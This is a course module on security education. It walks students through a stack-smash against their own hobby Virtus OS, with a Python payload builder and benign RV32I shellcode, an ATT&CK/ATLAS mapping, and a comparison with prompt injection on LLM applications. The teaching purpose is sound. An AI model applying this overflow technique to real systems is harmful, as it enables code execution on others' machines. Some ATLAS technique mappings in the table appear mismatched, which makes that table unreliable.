Duration: 2 hr lecture + 4 hr lab + 5 hr independent
Lab: Lab 2.1 (Stack-smash on Virtus OS v1; annotate at ATLAS level)
Points: 20
MITRE ATLAS coverage: ML Attack Staging (AML.T0043) as context; ATT&CK T1055 (Process Injection) as substrate-side analogue
Christian weave: The Alignment Problem, Prophecy Ch 2 (the COMPAS proxy problem) -- the structural claim that systems exploit proxies extends to runtime security invariants
Prerequisite: CSA-201 Module 7 (privilege levels, W^X, stack canaries on Virtus OS)
2.1 Why This Module Exists
AI-301 is a Belt-5 course. Every student arrives having reproduced production CVEs in LLM agentic systems. The question is whether those students have the substrate intuition to see the structural class behind the CVE.
Module 2 is not a remedial substrate module. It is a precision calibration. You will reproduce a stack-smash against your own Virtus OS v1 running on your Tang Nano (or Primer 25K). You will then annotate the attack at the structural level: what invariant was violated, what the exploit chain is, and what the language-level parallel is. The deliverable is not "I smashed the stack." It is "I can describe a stack-smash at the level of precision needed to write a coordinated-disclosure report for a language-layer exploit with the same structural class."
2.2 The Virtus OS v1 Exploitation Surface
Your Virtus OS v1, built in the CSA-101 capstone, is a functioning operating system running on an RV32I-Lite CPU. Its exploitation surface depends on which CSA-201 mitigations you applied. For Module 2, you need a version with:
- Stack canaries disabled (so the buffer overflow proceeds to overwrite the return address)
- W^X disabled (so injected shellcode can execute)
- Known stack layout (the CSA-201 debugging output that shows frame offsets)
If your CSA-201 implementation has all mitigations enabled, revert to the pre-mitigation branch or use the instructor-provided pre-mitigation binary image. The lab requires a vulnerable target -- the point is to perform the exploit, not to be stopped by defenses.
The exploitation surface in Virtus OS: The OS includes a simple command-line input handler that reads user input into a fixed-size buffer. This is the canonical stack-overflow target.
; Virtus OS input handler (from CSA-101 Ch 12; simplified representation)
; Stack frame at time of buffer read:
;
; [high addresses]
; [caller's frame]
; [saved ra (return address)] <- target for overwrite
; [saved fp (frame pointer)]
; [local variables (16 bytes)]
; [input_buffer[32]] <- 32-byte buffer (can accept more)
; [low addresses] <- stack grows down
;
; Total overwrite distance: 32 (buffer) + 16 (locals) + 4 (fp) = 52 bytes to reach saved ra
The exact layout depends on your CSA-101 implementation. Use the CSA-201 debugging toolchain (virtus-debug) to dump the stack frame layout for your specific build.
2.3 The Classic Stack-Smash: What Happens
A stack-smash exploits the failure to enforce the invariant "only the runtime may modify the saved return address." The sequence:
- Overflow the buffer: Write more bytes than the buffer can hold. The overflow extends beyond the buffer's bounds into adjacent stack memory.
- Overwrite local variables: The overflow passes through any local variables allocated above the buffer (at lower addresses on a downward-growing stack).
- Overwrite the saved frame pointer: The overflow reaches and overwrites the saved frame pointer.
- Overwrite the saved return address: The overflow reaches and overwrites the saved return address with the attacker's chosen value.
- Function return executes the overwrite: When the vulnerable function returns, it pops the attacker's value from the stack into the program counter. Execution jumps to the attacker's chosen address.
- Shellcode executes: If W^X is disabled, the attacker's chosen address points to shellcode injected into the buffer. The shellcode executes with the privileges of the calling program.
On Virtus OS, "shellcode" means RV32I machine-code instructions that the attacker injects into the overflow payload.
The invariant violation: The saved return address is security-critical state. The runtime assumes that only the function prologue writes it and only the function epilogue reads it. The buffer overflow violates this assumption by writing through the buffer bounds.
2.4 Crafting the Exploit Payload
The payload has three parts:
[padding] [fake_return_address] [shellcode]
Padding: Fill the buffer and overwrite locals + saved frame pointer with known values (e.g., 0x41414141 -- "AAAA" in ASCII, visible in memory dumps).
# Payload construction (Python, for generating the binary payload)
import struct
BUFFER_SIZE = 32 # bytes
LOCALS_SIZE = 16 # bytes
SAVED_FP_SIZE = 4 # bytes
PADDING_SIZE = BUFFER_SIZE + LOCALS_SIZE + SAVED_FP_SIZE # = 52 bytes
# For RV32I (little-endian), address of shellcode landing pad
# Shellcode will follow the fake return address in the payload
SHELLCODE_ADDR = 0x80001000 # adjust to your actual stack address
# (Get the actual address from virtus-debug stack dump)
padding = b'A' * PADDING_SIZE
fake_ra = struct.pack('<I', SHELLCODE_ADDR)
# RV32I shellcode: ECALL to trigger a privileged operation
# (in Virtus OS, ECALL with a0=0xFF causes a debug halt visible in logs)
# This is the "payload" -- not harmful, but demonstrates code execution
shellcode = bytes([
0x13, 0x05, 0xF0, 0x0F, # addi a0, zero, 0xFF -- syscall number
0x73, 0x00, 0x00, 0x00, # ecall
0x73, 0x00, 0x10, 0x00, # ebreak (halt; visible in simulator)
])
payload = padding + fake_ra + shellcode
print(f"Payload: {len(payload)} bytes")
print(f"Hex: {payload.hex()}")
Lab 2.1 Part A: Determine the correct SHELLCODE_ADDR for your Virtus OS build using virtus-debug. Craft the payload with the correct address and confirm that the ebreak instruction fires.
2.5 W^X and What Happens When It Is Enabled
When W^X is enabled, the shellcode in the payload cannot execute -- the CPU will fault on an attempt to fetch instructions from a page marked non-executable. The exploit as described above fails at step 6.
This is the motivation for ROP (Module 5): instead of injecting shellcode, the attacker chains together gadgets -- short sequences of existing executable instructions ending in a ret -- to build arbitrary computation from code already present in the executable image.
For now, observe the failure. Run the same payload against your Virtus OS with W^X enabled (re-enable it in the kernel configuration). Confirm:
- The overflow still reaches and overwrites the return address (the corruption still happens)
- The jump to the shellcode landing address causes a fault (the execution is stopped)
- The fault appears in the Virtus OS exception handler as a fetch-fault on a non-executable page
Lab 2.1 Part B: Document the W^X fault. Record: the faulting address, the exception code, and the comparison with the pre-W^X run. This is the "W^X mitigation is working" evidence.
2.6 ATLAS Annotation of the Attack
A stack-smash on Virtus OS is not natively an ML attack. But ATLAS includes several cases that involve compromising the substrate layer that an ML system runs on. More importantly, the ATLAS annotation discipline is the same as for a language-layer attack -- and practicing it on a substrate attack sharpens the annotation skill.
Map the stack-smash to ATT&CK + ATLAS:
| Stage | Classical ATT&CK technique | ATLAS equivalent (if any) | What happened |
|---|---|---|---|
| Discovery | T1082 System Information Discovery | AML.T0046 Security Software Discovery | Dump stack layout with virtus-debug |
| Initial Access | T1190 Exploit Public-Facing Application | AML.T0012 Valid Accounts (if remote) | Overflow via input handler |
| Execution | T1055 Process Injection | AML.T0041 ML Model Inference API Access (language parallel) | Shellcode via RET overwrite |
| Defense Evasion | T1562.001 Disable Security Tools | AML.T0015 Evade ML Model (language parallel) | W^X disabled on target |
Lab 2.1 Part C: Complete the annotation table for your specific exploit chain. Add any stages present in your reproduction that are absent from this template. Note which ATT&CK techniques have ATLAS analogues and which do not.
2.7 The Language-Layer Parallel: Side by Side
After completing Lab 2.1, pause and write the following comparison. This is the Module 2 essay question (200 words, submitted with the lab report):
Side by side comparison: stack-smash on Virtus OS vs prompt injection on DVLA (from AI-201 Lab 2).
The comparison should cover:
- What invariant was violated? (stack: only runtime modifies return address; DVLA: only system prompt defines instructions)
- What was the overflow vehicle? (stack: buffer overflow past bounds; DVLA: user input past trust boundary)
- What was the payload? (stack: shellcode or ROP chain; DVLA: injected instruction in user data)
- What was the execution trigger? (stack: function return; DVLA: model token generation)
- What mitigation exists? (stack: W^X + canaries; DVLA: prompt isolation + output filtering)
Writing this comparison is the point of Module 2. The lab proves you can perform both attacks. The essay proves you understand the structural relationship between them.
2.8 Christian: The Proxy Problem at Runtime
Christian's Prophecy chapter 2 uses COMPAS (the criminal risk assessment algorithm) as the worked example of the proxy problem: the system optimized a score that was a proxy for "recidivism risk," and the proxy diverged from the actual goal in ways that correlated with race. The structural point: any time a system enforces "the rules as stated" rather than "the intent behind the rules," the rules-as-stated become a proxy, and the proxy is exploitable.
The runtime security invariant "only the runtime modifies the return address" is a rules-as-stated enforcement. The hardware memory bus does not know or enforce intent -- it simply moves bytes. An overflow that writes past the buffer bounds is technically speaking a sequence of valid memory writes. The intent ("only the runtime writes here") is violated; the rule ("bytes can be written to memory") is not.
This is the same structural phenomenon at the substrate level as prompt injection at the language level: the rule ("process user input as text") is followed; the intent ("treat user input as untrusted data, never as instruction") is violated.
Christian's point about COMPAS is that the designer's mistake was thinking the proxy was the goal. The security analyst's point about buffer overflows is the same: thinking "valid memory write" means "correct behavior" is the proxy mistake. Belt-5 security work requires holding both the rule and the intent simultaneously -- and recognizing when an attacker has found a path that satisfies the rule while violating the intent.